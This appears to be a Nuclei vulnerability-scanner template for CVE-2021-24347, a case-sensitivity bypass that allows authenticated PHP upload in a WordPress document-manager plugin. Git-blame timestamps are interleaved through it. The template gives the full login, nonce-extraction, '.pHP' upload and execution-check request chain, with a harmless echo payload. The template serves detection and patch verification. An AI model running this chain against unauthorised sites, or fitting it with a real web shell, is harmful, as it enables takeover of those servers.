2023-03-05 13:42:10 +00:00
id : CVE-2021-24347
info :
2023-03-27 17:46:47 +00:00
name : WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : high
description : |
2023-03-27 17:46:47 +00:00
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
2023-03-27 17:46:47 +00:00
remediation : Fixed in version 4.22.
2023-03-05 13:42:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2023-03-05 14:19:20 +00:00
cvss-score : 8.8
2023-03-05 13:42:10 +00:00
cve-id : CVE-2021-24347
2023-03-05 14:19:20 +00:00
cwe-id : CWE-178
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:*:*:*
epss-score : 0.94776
2023-03-05 13:42:10 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 4
2023-06-04 08:13:42 +00:00
verified : true
2023-04-12 10:55:48 +00:00
tags : sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="dlg-upload-file[]"; filename=""
Content-Type : application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type : image/svg+xml
<?php
echo "CVE-2021-24347";
? >
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition : form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_4, "text/html")
2023-03-05 13:42:10 +00:00
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition : and
extractors :
- type : regex
name : nonce
group : 1
regex :
- 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"'
internal : true
